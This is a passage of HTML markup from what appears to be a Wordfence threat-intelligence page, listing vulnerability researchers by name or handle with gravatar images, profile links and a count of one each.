					<img decoding="async" src="https://www.gravatar.com/avatar/8dae08eb7d527264fd4e9c97ea820971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8dae08eb7d527264fd4e9c97ea820971"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener">andrea bocchetti</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e97952602dfd17f0532ab6202b1dd0db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e97952602dfd17f0532ab6202b1dd0db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kr0d" target="_blank" rel="noopener">kr0d</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/687b1a67f8c4dd6f731d33a8b3b970d4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="687b1a67f8c4dd6f731d33a8b3b970d4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peb" target="_blank" rel="noopener">Deadbee</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/45ee168e3ec0bb91083d6bb57a00e229.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ee168e3ec0bb91083d6bb57a00e229"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mukhlis-amien" target="_blank" rel="noopener">Mukhlis Amien</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2e52c2cb2bdde3798dc1a0ad0bab7470.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2e52c2cb2bdde3798dc1a0ad0bab7470"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarcisio-luchesipoystick" target="_blank" rel="noopener">Tarcísio Luchesi(Poystick)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/789d82b6dd44c10255b1752a99118a7e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="789d82b6dd44c10255b1752a99118a7e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-amin-ullah-sheikh" target="_blank" rel="noopener">Md Amin Ullah Sheikh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8b3f0797781c7ba63352fd9b82ef63a9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8b3f0797781c7ba63352fd9b82ef63a9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi" target="_blank" rel="noopener">Khaled Alenazi (Nxploited)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f136390468287a6e9b71b79fe2a17e76.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f136390468287a6e9b71b79fe2a17e76"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nia" target="_blank" rel="noopener">Nia</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dave-jong" target="_blank" rel="noopener">Dave Jong</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86d39645cda69d6da0e000d9158634e7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86d39645cda69d6da0e000d9158634e7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/youssef-massoudi" target="_blank" rel="noopener">Youssef massoudi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0112689c0902c446cae4406a12504fb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0112689c0902c446cae4406a12504fb2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdoo-slax" target="_blank" rel="noopener">sl4x0</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener">Bao &#8211; BlueRock</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1cc663e2f3efb377e8165cec61197c25.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1cc663e2f3efb377e8165cec61197c25"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/k-sorrachat" target="_blank" rel="noopener">K. Sorrachat</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/21d84c9bfb9b111185328d94d86b38d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="21d84c9bfb9b111185328d94d86b38d5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/or-benit" target="_blank" rel="noopener">Or Benit</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c4d4f022dc9a23568fb89d3b328e6cb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4d4f022dc9a23568fb89d3b328e6cb2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener">Ryan Fabella</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1a5d302225f6ffcbb6f31b7b9ca2ffc4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1a5d302225f6ffcbb6f31b7b9ca2ffc4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-hpt-vietnam-corporation" target="_blank" rel="noopener">Nguyen Ba Khanh &#8211; HPT Vietnam Corporation</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5a50351dc3a5975487697a55ad3936d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a50351dc3a5975487697a55ad3936d5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener">UKO</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d996746957e68308f3af4295949d729c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d996746957e68308f3af4295949d729c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-theriault-laine" target="_blank" rel="noopener">Vincent Theriault-Laine</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pierre-rudloff" target="_blank" rel="noopener">Pierre Rudloff</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/755c27bc10b9191ede88f572e832d542.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="755c27bc10b9191ede88f572e832d542"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-van-mrs0x06" target="_blank" rel="noopener">Son Van (mrs0x06)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bc0ca0683e2f48d801834cc849d05ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc0ca0683e2f48d801834cc849d05ed9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener">zickzick2</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/482f7d5936d2268f1f9cdaa84f3867db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="482f7d5936d2268f1f9cdaa84f3867db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cuokon" target="_blank" rel="noopener">cuokon</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/336a4835171563e9c198b2d4dee1fa34.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="336a4835171563e9c198b2d4dee1fa34"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaki-zaki" target="_blank" rel="noopener">zakaria</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5a9694ec4dc4027d7cceada3b72f41fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a9694ec4dc4027d7cceada3b72f41fa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chinhnguyen" target="_blank" rel="noopener">ChinhNguyen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1c4391be2148aea7fca24075cd6c4c20.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1c4391be2148aea7fca24075cd6c4c20"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tal-kantor" target="_blank" rel="noopener">Tal Kantor</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2c009f880c37af5ab9adcc8490628a98.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c009f880c37af5ab9adcc8490628a98"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-nguyen" target="_blank" rel="noopener">Nguyen Ngoc Duc (duc193)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener">0xzenko</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/807a1a84f7f8e0b4eb76852c9e02e21d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="807a1a84f7f8e0b4eb76852c9e02e21d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mykel-nelson" target="_blank" rel="noopener">Mykel Nelson</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1ca6e24c1152dfd748d1d9f882bdced9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ca6e24c1152dfd748d1d9f882bdced9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coopernicus" target="_blank" rel="noopener">Coopernicus</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cacf4ee88693364dcf8ccac51b575d6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cacf4ee88693364dcf8ccac51b575d6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener">Luis Koleski</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3f87b1e29a7dffa171d90f689dfa86c7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3f87b1e29a7dffa171d90f689dfa86c7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sahraoui-aymen" target="_blank" rel="noopener">SAHRAOUI AYMEN</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2400719fbf58ba13f3eda25084096ad3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2400719fbf58ba13f3eda25084096ad3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener">swat</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6354b317fcf2c6bde1d3a0b7e8bd25f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6354b317fcf2c6bde1d3a0b7e8bd25f0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener">testoun</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/848ff46b2a1d687cc8e2670b302e1548.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="848ff46b2a1d687cc8e2670b302e1548"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener">Civitasmass</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ac6bf1005b916352d965412b8d10a2a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ac6bf1005b916352d965412b8d10a2a5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener">WEI HSIANG WANG</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/48c75fb70feac5c77a422be7b9c6a1f8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="48c75fb70feac5c77a422be7b9c6a1f8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/non-nss" target="_blank" rel="noopener">zalomkiller</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c2f379550a74607b173a9a120b640a71.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2f379550a74607b173a9a120b640a71"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-quang-truong-roll" target="_blank" rel="noopener">Nguyen Truong (Roll)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/531a20fc5603f1e53d92613733a0fa01.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="531a20fc5603f1e53d92613733a0fa01"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/endang-alfarisi" target="_blank" rel="noopener">Endang Alfarisi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d332300984f1d3c8df18ac3a611be66c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d332300984f1d3c8df18ac3a611be66c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez-francisco-jose-ramirez-vicente-and-inigo-sanchez-enciso" target="_blank" rel="noopener">Pablo González Pérez, Francisco José Ramírez Vicente and Iñigo Sánchez Enciso</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/416da74662adf95005d209efd456836e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="416da74662adf95005d209efd456836e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taichi-kashimura" target="_blank" rel="noopener">Taichi Kashimura</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/59130a0d7d2c05091f16f97f2632ad64.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="59130a0d7d2c05091f16f97f2632ad64"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitebyte" target="_blank" rel="noopener">whitebyte</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/391706731077de4a1e991524d6b9c870.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="391706731077de4a1e991524d6b9c870"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mark-moore" target="_blank" rel="noopener">Mark Moore</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ba1d2710a853204f30b056c37853fa4b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba1d2710a853204f30b056c37853fa4b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/omar-elshopky-2" target="_blank" rel="noopener">Omar Elshopky</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f36c6f9e5c03ad8f37eb6faab59d90d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f36c6f9e5c03ad8f37eb6faab59d90d8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener">Riyas M S</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joshua-martinelle" target="_blank" rel="noopener">Joshua Martinelle</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fb7c688fd0a4e11bf489da14ffa632a3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fb7c688fd0a4e11bf489da14ffa632a3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karan-j" target="_blank" rel="noopener">Karan J</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/553cb97e15a106a04fa7e72b813e84b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="553cb97e15a106a04fa7e72b813e84b1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhammad-sharief" target="_blank" rel="noopener">Muhammad Sharief</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
